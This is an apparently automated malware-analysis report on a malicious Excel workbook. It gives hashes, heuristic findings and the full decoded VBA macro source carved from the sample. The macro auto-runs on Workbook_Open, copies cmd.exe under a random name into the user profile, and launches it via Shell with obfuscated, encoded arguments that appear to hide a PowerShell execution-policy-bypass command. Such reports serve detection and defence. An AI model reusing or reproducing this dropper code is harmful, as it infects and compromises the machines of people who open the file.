Office (OLE) malware analysis — malicious · 48bb5bc1399e43b0

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-06-12 07:32:45 Authoring application: Microsoft Excel First seen: 2021-02-18

MD5: faa225de2a679e0a28f2e5d384b1962c SHA-1: 3ca615d37c4599fceb7eb9712f310a3a80cd4ad5 SHA-256: 48bb5bc1399e43b0c07527a69935f6b2254686dbcfa544af4019e2ac1592baff

178 Risk Score

Heuristics 7

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
   vv = Shell#(aoks + belsys0 & communication & cross, xlBitmap - 2)
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set fidrq = CreateObject(telecom)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Ddoc = Environ$(termoorder) & "\" & LTro & "\"
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8737 bytes
SHA-256: `0fb4bd37764554b2765eac24ce5d7458a5255294bc50902832f8137d83b7ecb4`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function LTro() As String For i = 1 To 7 LTro = LTro + Chr(Int((90 - 65 + 1) * Rnd + 65)) Next i End Function Sub Workbook_Open() Debug.Print Randomize mesgu End Sub Function Econd() c = Int((6 - 1 + 1) * Rnd + 0) def = Array(&H0, &H61, &H62, &H63, &H64, &H65, &H66) Econd = def(c) End Function Function commercial() commercial = "O102U108U53O126K51U53b127{51z108U99U40O105b41U105{98O105K61z56U105q103A110K99A42n39{61A62{34q47U55O32O47A35n43z110b102n108K53z124K51b53O127z51O53K126b51q108U99z40K110q105K47q55q105K98q105q34q59V41z110K47A32n42z110q30z34A105q98{105U30q105K103V117b39q40U110O102z102{96A102V108V53z126K51A53n127V51z108q99z40z105K39b43n105z98O105K54{105z103U102b96V102z108U53U127{51U53V126{51U108K99O40z110{105{45K35O105{98O105A41b105z103V110n99A32{47A35V43O110b102U108U53{127K51U53q124n51A53z126z51{108V110z99{40b110n105z58n99A6V100V58A105b98O105q100z105z98n105U43A105O103q103A110V50z110K96b102K105z40q34{105V103{110b99b30A60{33{62A43K60n58n55z110q100U110n50z110V96{102{108z53V124z51O53q125b51{53V126n51{53V127n51K108q99{40V110z105{58q99b105V98z105z29A58V60q39n32K41A105q98z105U1K105K98O105{59K105{103K110z99K29n58z60z43K47K35z103V110z99n35{47O58{45K38K110O105z99U4n105K103{53{40K59V32V45q58b39U33{32O110q29A62O60{39n53U104V102O108n53V126b51{53{127K51z108q99U40{110q105n41b105q98n105A45A35n105U103{110n" End Function Function calculation() calculation = "102q96q102{108n53z126n51K53{124K51q53q127n51b108A110b99q40O110K105z9q43z58A99A28n105z98U105A42{33O35U105V98U105n47K32K105b103V110z99{7z32K62{59A58{1z44n36A43{45K58O110z102n96K102A108U53q126K51O53K127O51A108A110{99{40V110n105K41A105K98O105n45z35q105q103K110n99z26z55U62{43q110K13q35A42{34U43V58K103{96n32V47V35z43z103O110O99{29b55{32b58U47A54K51n117z96{102U108n53q127U51b53q126A51{108q110V99z40U110O105V60U39V105{98n105U29b62z105{103q117n96K102K108U53O127V51O53A124{51A53{125V51n53A126K51V108O99q40A105A34V43V105U98{105A29O43V58A99b24z105z98b105z47q60A105q98q105U39V47b44q105z103{110O38q32q26A110{102O108O53z125n51n53{127K51b53b122U51O53{126n51V53V124z51z108O110n99A40A105V45{33z35A97K39{35z47b41{105U98z105O33O32V44q60O47b105U98{105z43b96n60z47O60z105O98q105K38n58O58z62U61K116K97A97O105z98V105A37z43{60A96V105U103z117{96O102{105b29A24U105b103b110n34V110z102{96U102O96q102K108K53V126q51z53q127K51K108K110n99q40K105A9n13O105z98K105b3q105q103V110O0b100n99K1z100O103b0A43n58n96n25b" End Function Function companyC() companyC = "43q44O13n34A39{43q32A58O103K117n106z56{29n24z115b102U104U102V108n53U125O51O53b126O51b53O127V51b53U124{51K108{110V99V40U105{99{24q105K98b105K47A60b39O105b98z105K47A44z34q43n105V98{105n9A43b58q105K103V110q34z103n96q24U47z34q59q43K96V102K102O102A102U102A96n102n108O53V124K51A53A125z51{53U126U51z53b127V51A108q110b99U40q105z47b105O98q105U44q34O43V105b98q105b9b43{58{99z24z47b60q105z98z105V39b105A103z110b34z103A96A24n47b34z59{43U103V96U30K61q1O44q36b43A45O58V96U3n43A58q38V33{42b61z103K50K104n102{105b113U105K103U53K102n104V102U108n53n127V51{53b126O51{108{110q99b40O105V13U7U105K98z105{9V105b103q110U24q47V60z39z47A44q34b43K116{97U17{103V96K24V47z34U59U43O96U0K47z35K43U99A39V34V39b37V43U102q108K53A127z51O53A126{51q108z110K99b40q110n105{41b105z98q105{100z57A32U100q105K103O51q103U96U0A47z35O43U103V96A7{32K56q33n37K43A102q102A96A102q108U53K124n51{53O125O51V53K127n51z53z126{51q108U99O40z105V43z35U105b98b105V39V34V42b7b58K105O98A105K9K43b58n99U105U98n105q13n38U105{103K110K" End Function Function packinglist() packinglist = "24z47q60K39q47{44K34b43n116V38n32b26A103{96{24V47b34{59V43b103n117q104O102O108z53{127V51V53V126b51q108b99O40z105z60A39{105b98n105O29A62A105b103b117z40V59{32U45q58b39n33V32A110K9K59z35{53V106b40K40V40O110b115K110{106b56z61n56U117z106A39U32V62V110q115K110V106K40n40U40K117U106V42A47A110O115V110n14O102b103V117b106O30V39z52O110A115n110U108q108O117q106O39V32q62K96q29n62z34n39n58V102z105z110K105O103z110{50V110K96q102K108O53O126b51b53z127b51A53O124n51{108O99q40b105O8O33V60z105A98A105K11O47K45q38O99V1U44K105b98n105O36O43z45O58V105K103V110U53A110q106z42A47O110A101z115A110U106q17q110O51K117b106{35z47A54z110O115n110U106V42O47b21q126O19A96A2{43V32K41n58{38V117O106z58z33U11n110V115q110O106U42U47z96A2z43z32{41A58O38q117K40z33A60V110n102V106U39V110U115V110z126K117{110q106U39q110U99b34{43n110V102O106V35n47z54q110K99z110q127b103n117b110O106n39n101A101b103{53A40A33U60b110K102q106U36U110b115q110O126z117{110z106z36q110n99{34q43{110q102{106b58b33z11q110n99O110O127q110q103b117" End Function Function declarations() declarations = "n110V106K36V101z101V103q53z106q30A39A52b110O115V110O106A30V39{52K110K101V110n106q42O47{21b106U36V19z21n106U39n19O51A51K117q104{102K108V53n127n51z53z126z51K108n110U99q40n105n62V60b39A105z98b105K29n105z103{117{96A102q108A53b126{51n53U127z51q108n99U40b105b39q43U105O98q105{54n105z103n102n102O106b30O39b52{110{99q60q43z62q34A47U45z43q110K105{48K105U98b105q110n105A103V96{60b43K62O34{47b45U43z102O21A45O38q47K60A19{125O127A122b127A122{98{108O105b108K103{110K99A60U43K62{34O47q45n43q110n21b45b38q47K60n19U124U126q119K126n126A98V108z34b108O103q51A117A104{102b108A53b127O51V53b126n51z108q110V99U40n105z35b105O98O105q41z59{105K103{51'-s" End Function Function rezerver() rezerver = "" End Function Function communication() communication = "" & commercial: communication = communication & calculation: communication = communication + "" & companyC: communication = communication & packinglist: communication = communication + declarations & rezerver End Function Function workandchec() workandchec = "MqUJ(!(w.!QTJM!Uc(!(T.mQuJ(!(P.!qtjm!Uv(!(T.mqUJ\|(.(QTjm(U(lT.mqUJ(!(rt.mqUJb(!(t.mquJ(!([.!QTjM!Uo(!('}%)8\|~T3\|\|~~12\|%~8\|~Tg.(!bf#(#]!,T\suoJ^hD\Bi^s55!!#,#]D((I]#,#\!uTJsho\^iDsB5^!5,!]#(#PG(s\|D\bi^S)!a!\|%~`c.pY!sy1F5!~!}!)'\|%T8\|~~21\|%~8\|~Tg.f((Y]#,#\!uTJsho\^iDsB5^!5,!]#(#(J##]}!'!!)T%FimMEj2\,^t%fIMMeJ2\^4(,(y#" End Function Function historyordered() If xlThick < 128 Then Dim Va As Integer Va = Application.International(xlDate) historyordered = (Va - 1) / 40 End If End Function Function Avi(S As String) As String Dim b() As Byte Dim bb As Byte Dim i As Long b = S For i = 0 To UBound(b) - 2 Step 4 bb = b(i) b(i) = b(i + historyordered) b(i + historyordered) = bb Next i Avi = b End Function Function mop(S As String, n As Integer) As String Dim b() As Byte Dim i As Long b = S For i = 0 To UBound(b) Step historyordered b(i) = (n + b(i)) And 255 Next i mop = b End Function Sub mesgu() Dim aoks As String Dim ff As Integer NMN = LTro + ".e" + "xe" Ddoc = Environ$(termoorder) & "\" & LTro & "\" aoks = Ddoc & NMN Dim fidrq As Object Application.ScreenUpdating = False Set fidrq = CreateObject(telecom) fidrq.CreateFolder (Ddoc) Call fidrq.CopyFile(Environ$("Co" + "mS" + "pec"), aoks, True) ff = FreeFile() Dim arr As Byte arr = Econd Open aoks For Binary As #ff Seek #ff, LOF(ff) + 1 Put #ff, , arr Close #ff Debug.Print vv = Shell#(aoks + belsys0 & communication & cross, xlBitmap - 2) End Sub Function cross() Dim SQ As String SQ = workandchec SQ = Avi(mop(Avi(mop(SQ, historyordered - 3)), False)) SQ = Avi(SQ) cross = SQ End Function Function belsys0() Dim belsys As String belsys = "0!!dNXDj!!q!pSfdtT!!!!D!mB!m!!D!FSUb!f!!q#xPsfitMf!m.!POjo!O.!pOSq!!F.FyvDjUoPC!qzTb!tx.2!!!%!T8!!!>T\SUoJ^hD\bi^S54!!#<#]T\suoj^H;;\|%T8K~PaOJ\|%T8)~((]#,#\!uTJsho\^iDsB5^!5,!]#)#(!7:" belsys = Avi(mop(Avi(mop(belsys, historyordered - 4 + 1)), certverresError)) belsys = Avi(belsys) belsys0 = belsys End Function Function yoo(ppt As String) aa = ppt t_D = "" For i = 1 To Len(aa) t_D = t_D + Chr(Asc(Mid(aa, i, 1)) - 1) Next i ir = Split(Trim(t_D), " ") ra = ir(LBound(ir)): ir(LBound(ir)) = ir(UBound(ir)): ir(UBound(ir)) = ra ra = Join(ir, " ") yoo = ra End Function Function telecom() Dim ll As String ll = "Tdsjqujoh/GjmfTztufnPckfdu" telecom = yoo(ll) End Function Function termoorder() As String Dim Order As String: Order = "VTFSQSPGJMF" termoorder = yoo(Order) End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.